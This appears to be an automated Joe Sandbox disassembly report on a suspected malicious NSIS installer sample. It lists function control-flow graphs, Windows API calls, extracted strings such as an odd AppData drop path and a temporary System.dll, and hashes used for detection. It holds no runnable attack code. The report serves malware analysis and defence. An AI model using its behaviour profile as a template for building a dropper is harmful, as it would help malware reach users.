404072-4040b1 call 40424c call 403d1f call 406282 lstrlenW call 4062a4 SetWindowTextW call 401389 338->340 339->340 340->279 351 4040b7-4040b9 340->351 351->279 352 4040bf-4040c3 351->352 353 4040e2-4040f6 DestroyWindow 352->353 354 4040c5-4040cb 352->354 353->287 356 4040fc-404129 CreateDialogParamW 353->356 354->278 355 4040d1-4040d7 354->355 355->279 357 4040dd 355->357 356->287 358 40412f-404186 call 404217 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->278 358->278 363 404188-4041a0 ShowWindow call 404263 358->363 363->287
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D7A
                                                          • ShowWindow.USER32(?), ref: 00403D97
                                                          • DestroyWindow.USER32 ref: 00403DAB
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DC7
                                                          • GetDlgItem.USER32(?,?), ref: 00403DE8
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DFC
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403E03
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403EB1
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403EBB
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403ED5
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F26
                                                          • GetDlgItem.USER32(?,00000003), ref: 00403FCC
                                                          • ShowWindow.USER32(00000000,?), ref: 00403FED
                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FFF
                                                          • EnableWindow.USER32(?,?), ref: 0040401A
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404030
                                                          • EnableMenuItem.USER32(00000000), ref: 00404037
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040404F
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404062
                                                          • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 0040408C
                                                          • SetWindowTextW.USER32(?,0042D248), ref: 004040A0
                                                          • ShowWindow.USER32(?,0000000A), ref: 004041D4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                          • String ID:
                                                          • API String ID: 3282139019-0
                                                          • Opcode ID: d98e6c65d60d857f3aa4eca315e3afb6b45dd94bb5928597cafe6023f70925fc
                                                          • Instruction ID: 2b8d66c2e1a38ac8fa8a62e4dcdff4cf04ad9fa750ea4aef2484392c4ac96c84
                                                          • Opcode Fuzzy Hash: d98e6c65d60d857f3aa4eca315e3afb6b45dd94bb5928597cafe6023f70925fc
                                                          • Instruction Fuzzy Hash: 3EC1D2B1600200AFDB216F61ED89E2B3A68FB94706F04057EF641B51F1CB799982DB6D
                                                          Function 00403990 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 366 403990-4039a8 call 40665c 369 4039aa-4039ba call 4061c9 366->369 370 4039bc-4039f3 call 406150 366->370 379 403a16-403a3f call 403c66 call 405c5b 369->379 375 4039f5-403a06 call 406150 370->375 376 403a0b-403a11 lstrcatW 370->376 375->376 376->379 384 403ad1-403ad9 call 405c5b 379->384 385 403a45-403a4a 379->385 391 403ae7-403b0c LoadImageW 384->391 392 403adb-403ae2 call 4062a4 384->392 385->384 386 403a50-403a78 call 406150 385->386 386->384 393 403a7a-403a7e 386->393 395 403b8d-403b95 call 40140b 391->395 396 403b0e-403b3e RegisterClassW 391->396 392->391 397 403a90-403a9c lstrlenW 393->397 398 403a80-403a8d call 405b80 393->398 410 403b97-403b9a 395->410 411 403b9f-403baa call 403c66 395->411 399 403b44-403b88 SystemParametersInfoW CreateWindowExW 396->399 400 403c5c 396->400 404 403ac4-403acc call 405b53 call 406282 397->404 405 403a9e-403aac lstrcmpiW 397->405 398->397 399->395 403 403c5e-403c65 400->403 404->384 405->404 409 403aae-403ab8 GetFileAttributesW 405->409 414 403aba-403abc 409->414 415 403abe-403abf call 405b9f 409->415 410->403 419 403bb0-403bca ShowWindow call 4065ec 411->419 420 403c33-403c3b call 4053b9 411->420 414->404 414->415 415->404 427 403bd6-403be8 GetClassInfoW 419->427 428 403bcc-403bd1 call 4065ec 419->428 425 403c55-403c57 call 40140b 420->425 426 403c3d-403c43 420->426 425->400 426->410 429 403c49-403c50 call 40140b 426->429 432 403c00-403c23 DialogBoxParamW call 40140b 427->432 433 403bea-403bfa GetClassInfoW RegisterClassW 427->433 428->427 429->410 437 403c28-403c31 call 4038e0 432->437 433->432 437->403
                                                          APIs
                                                            • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                            • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                          • lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\450707124374000811.exe",00000000), ref: 00403A11
                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A91
                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403AA4
                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403AAF
                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\pechay\transskribere\jon), ref: 00403AF8
                                                            • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                          • RegisterClassW.USER32(00433E80), ref: 00403B35
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B4D
                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B82
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403BB8
                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BE4
                                                          • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403BF1
                                                          • RegisterClassW.USER32(00433E80), ref: 00403BFA
                                                          • DialogBoxParamW.USER32(?,00000000,00403D3E,00000000), ref: 00403C19
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\Desktop\450707124374000811.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                          • API String ID: 1975747703-2713776338
                                                          • Opcode ID: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
                                                          • Instruction ID: b69a5953a59a380dedfc974e339360e26c19c43312473aa69c5b527d033ca56b
                                                          • Opcode Fuzzy Hash: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
                                                          • Instruction Fuzzy Hash: 7061A8312003006ED320BF669D46F673A6CEB84B5AF40053FF945B62E2DB7DA9418A2D
                                                          Function 00402EC1 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 440 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d74 443 402f11-402f16 440->443 444 402f1b-402f49 call 406282 call 405b9f call 406282 GetFileSize 440->444 445 4030f3-4030f7 443->445 452 403036-403044 call 402e5d 444->452 453 402f4f 444->453 459 403046-403049 452->459 460 403099-40309e 452->460 455 402f54-402f6b 453->455 457 402f6d 455->457 458 402f6f-402f78 call 403315 455->458 457->458 467 4030a0-4030a8 call 402e5d 458->467 468 402f7e-402f85 458->468 462 40304b-403063 call 40332b call 403315 459->462 463 40306d-403097 GlobalAlloc call 40332b call 4030fa 459->463 460->445 462->460 491 403065-40306b 462->491 463->460 489 4030aa-4030bb 463->489 467->460 469 403001-403005 468->469 470 402f87-402f9b call 405d2f 468->470 477 403007-40300e call 402e5d 469->477 478 40300f-403015 469->478 470->478 487 402f9d-402fa4 470->487 477->478 480 403024-40302e 478->480 481 403017-403021 call 40674f 478->481 480->455 488 403034 480->488 481->480 487->478 493 402fa6-402fad 487->493 488->452 494 4030c3-4030c8 489->494 495 4030bd 489->495 491->460 491->463 493->478 496 402faf-402fb6 493->496 497 4030c9-4030cf 494->497 495->494 496->478 498 402fb8-402fbf 496->498 497->497 499 4030d1-4030ec SetFilePointer call 405d2f 497->499 498->478 500 402fc1-402fe1 498->500 503 4030f1 499->503 500->460 502 402fe7-402feb 500->502 504 402ff3-402ffb 502->504 505 402fed-402ff1 502->505 503->445 504->478 506 402ffd-402fff 504->506 505->488 505->504 506->478
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402ED2
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\450707124374000811.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                            • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                            • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                          • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\450707124374000811.exe,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                          • String ID: "C:\Users\user\Desktop\450707124374000811.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\450707124374000811.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 4283519449-639599842
                                                          • Opcode ID: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                          • Instruction ID: 5fb561c1f1da7fe65fe29aa304fda9dad36d264b5387f138e6185790fd874317
                                                          • Opcode Fuzzy Hash: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                          • Instruction Fuzzy Hash: 18510471902216AFDB20AF64DD85B9E7EB8FB00359F15403BF904B62C5C7789E408B6C
                                                          Function 004062A4 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 507 4062a4-4062af 508 4062b1-4062c0 507->508 509 4062c2-4062d8 507->509 508->509 510 4064f0-4064f6 509->510 511 4062de-4062eb 509->511 512 4064fc-406507 510->512 513 4062fd-40630a 510->513 511->510 514 4062f1-4062f8 511->514 515 406512-406513 512->515 516 406509-40650d call 406282 512->516 513->512 517 406310-40631c 513->517 514->510 516->515 518 406322-406360 517->518 519 4064dd 517->519 521 406480-406484 518->521 522 406366-406371 518->522 523 4064eb-4064ee 519->523 524 4064df-4064e9 519->524 527 406486-40648c 521->527 528 4064b7-4064bb 521->528 525 406373-406378 522->525 526 40638a 522->526 523->510 524->510 525->526 529 40637a-40637d 525->529 532 406391-406398 526->532 530 40649c-4064a8 call 406282 527->530 531 40648e-40649a call 4061c9 527->531 533 4064ca-4064db lstrlenW 528->533 534 4064bd-4064c5 call 4062a4 528->534 529->526 535 40637f-406382 529->535 545 4064ad-4064b3 530->545 531->545 537 40639a-40639c 532->537 538 40639d-40639f 532->538 533->510 534->533 535->526 541 406384-406388 535->541 537->538 543 4063a1-4063bf call 406150 538->543 544 4063da-4063dd 538->544 541->532 553 4063c4-4063c8 543->553 546 4063ed-4063f0 544->546 547 4063df-4063eb GetSystemDirectoryW 544->547 545->533 549 4064b5 545->549 551 4063f2-406400 GetWindowsDirectoryW 546->551 552 40645b-40645d 546->552 550 40645f-406463 547->550 554 406478-40647e call 406516 549->554 550->554 559 406465 550->559 551->552 552->550 556 406402-40640c 552->556 557 406468-40646b 553->557 558 4063ce-4063d5 call 4062a4 553->558 554->533 562 406426-40643c SHGetSpecialFolderLocation 556->562 563 40640e-406411 556->563 557->554 560 40646d-406473 lstrcatW 557->560 558->550 559->557 560->554 566 406457 562->566 567 40643e-406455 SHGetPathFromIDListW CoTaskMemFree 562->567 563->562 565 406413-40641a 563->565 569 406422-406424 565->569 566->552 567->550 567->566 569->550 569->562
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E5
                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 004063F8
                                                          • SHGetSpecialFolderLocation.SHELL32(0040531D,0041D800,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 00406434
                                                          • SHGetPathFromIDListW.SHELL32(0041D800,Call), ref: 00406442
                                                          • CoTaskMemFree.OLE32(0041D800), ref: 0040644D
                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
                                                          • lstrlenW.KERNEL32(Call,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 004064CB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 717251189-1230650788
                                                          • Opcode ID: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
                                                          • Instruction ID: 2bc9f3e321a063d065e255e84c3e845f89f4622f689527909a28eedc1d3cb15f
                                                          • Opcode Fuzzy Hash: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
                                                          • Instruction Fuzzy Hash: 1D613631A00205ABDF209F64CD41ABE37A5AF44318F16813FE947B62D1D77C5AA1CB9D
                                                          Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 634 40176f-401794 call 402c37 call 405bca 639 401796-40179c call 406282 634->639 640 40179e-4017b0 call 406282 call 405b53 lstrcatW 634->640 645 4017b5-4017b6 call 406516 639->645 640->645 649 4017bb-4017bf 645->649 650 4017c1-4017cb call 4065c5 649->650 651 4017f2-4017f5 649->651 658 4017dd-4017ef 650->658 659 4017cd-4017db CompareFileTime 650->659 653 4017f7-4017f8 call 405d4f 651->653 654 4017fd-401819 call 405d74 651->654 653->654 661 40181b-40181e 654->661 662 40188d-4018b6 call 4052e6 call 4030fa 654->662 658->651 659->658 663 401820-40185e call 406282 * 2 call 4062a4 call 406282 call 4058e4 661->663 664 40186f-401879 call 4052e6 661->664 676 4018b8-4018bc 662->676 677 4018be-4018ca SetFileTime 662->677 663->649 697 401864-401865 663->697 674 401882-401888 664->674 678 402ac8 674->678 676->677 680 4018d0-4018db CloseHandle 676->680 677->680 682 402aca-402ace 678->682 683 4018e1-4018e4 680->683 684 402abf-402ac2 680->684 686 4018e6-4018f7 call 4062a4 lstrcatW 683->686 687 4018f9-4018fc call 4062a4 683->687 684->678 691 401901-4022f6 call 4058e4 686->691 687->691 691->682 697->674 699 401867-401868 697->699 699->664
                                                          APIs
                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,?,?,00000031), ref: 004017B0
                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,?,?,00000031), ref: 004017D5
                                                            • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                            • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                            • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                            • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,74DF23A0), ref: 00405341
                                                            • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                            • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsqA869.tmp$C:\Users\user\AppData\Local\Temp\nsqA869.tmp\System.dll$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$Call
                                                          • API String ID: 1941528284-1425817745
                                                          • Opcode ID: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
                                                          • Instruction ID: 71989b97474780e21d9e3883d12846d469cfbdfaa42366440e3466e884ca0043
                                                          • Opcode Fuzzy Hash: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
                                                          • Instruction Fuzzy Hash: C1419431900518BECF11BBA5DC46DAF3679EF45328F20423FF412B50E1DA3C8A519A6D
                                                          Function 004030FA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 700 4030fa-403111 701 403113 700->701 702 40311a-403123 700->702 701->702 703 403125 702->703 704 40312c-403131 702->704 703->704 705 403141-40314e call 403315 704->705 706 403133-40313c call 40332b 704->706 710 403303 705->710 711 403154-403158 705->711 706->705 712 403305-403306 710->712 713 4032ae-4032b0 711->713 714 40315e-4031a7 GetTickCount 711->714 717 40330e-403312 712->717 715 4032f0-4032f3 713->715 716 4032b2-4032b5 713->716 718 40330b 714->718 719 4031ad-4031b5 714->719 720 4032f5 715->720 721 4032f8-403301 call 403315 715->721 716->718 722 4032b7 716->722 718->717 723 4031b7 719->723 724 4031ba-4031c8 call 403315 719->724 720->721 721->710 734 403308 721->734 727 4032ba-4032c0 722->727 723->724 724->710 733 4031ce-4031d7 724->733 730 4032c2 727->730 731 4032c4-4032d2 call 403315 727->731 730->731 731->710 737 4032d4-4032e0 call 405e26 731->737 736 4031dd-4031fd call 4067bd 733->736 734->718 742 403203-403216 GetTickCount 736->742 743 4032a6-4032a8 736->743 744 4032e2-4032ec 737->744 745 4032aa-4032ac 737->745 746 403261-403263 742->746 747 403218-403220 742->747 743->712 744->727 748 4032ee 744->748 745->712 751 403265-403269 746->751 752 40329a-40329e 746->752 749 403222-403226 747->749 750 403228-40325e MulDiv wsprintfW call 4052e6 747->750 748->718 749->746 749->750 750->746 755 403280-40328b 751->755 756 40326b-403272 call 405e26 751->756 752->719 753 4032a4 752->753 753->718 758 40328e-403292 755->758 760 403277-403279 756->760 758->736 761 403298 758->761 760->745 762 40327b-40327e 760->762 761->718 762->758
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CountTick$wsprintf
                                                          • String ID: ... %d%%$@
                                                          • API String ID: 551687249-3859443358
                                                          • Opcode ID: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                          • Instruction ID: f75c430432033e5046526aed0a4a2f939c591a2e87bafbbe4e5c1659d7ec9983
                                                          • Opcode Fuzzy Hash: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                          • Instruction Fuzzy Hash: 85515A71900219EBDB10CF69DA84B9E7FA8AF45366F14417BEC14B72C0C778DA50CBA9
                                                          Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 763 402644-40265d call 402c15 766 402663-40266a 763->766 767 402abf-402ac2 763->767 768 40266c 766->768 769 40266f-402672 766->769 770 402ac8-402ace 767->770 768->769 771 4027d6-4027de 769->771 772 402678-402687 call 4061e2 769->772 771->767 772->771 776 40268d 772->776 777 402693-402697 776->777 778 40272c-40272f 777->778 779 40269d-4026b8 ReadFile 777->779 780 402731-402734 778->780 781 402747-402757 call 405df7 778->781 779->771 782 4026be-4026c3 779->782 780->781 783 402736-402741 call 405e55 780->783 781->771 791 402759 781->791 782->771 785 4026c9-4026d7 782->785 783->771 783->781 788 402792-40279e call 4061c9 785->788 789 4026dd-4026ef MultiByteToWideChar 785->789 788->770 789->791 792 4026f1-4026f4 789->792 795 40275c-40275f 791->795 796 4026f6-402701 792->796 795->788 797 402761-402766 795->797 796->795 798 402703-402728 SetFilePointer MultiByteToWideChar 796->798 799 4027a3-4027a7 797->799 800 402768-40276d 797->800 798->796 801 40272a 798->801 802 4027c4-4027d0 SetFilePointer 799->802 803 4027a9-4027ad 799->803 800->799 804 40276f-402782 800->804 801->791 802->771 805 4027b5-4027c2 803->805 806 4027af-4027b3 803->806 804->771 807 402784-40278a 804->807 805->771 806->802 806->805 807->777 808 402790 807->808 808->771
                                                          APIs
                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                            • Part of subcall function 00405E55: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E6B
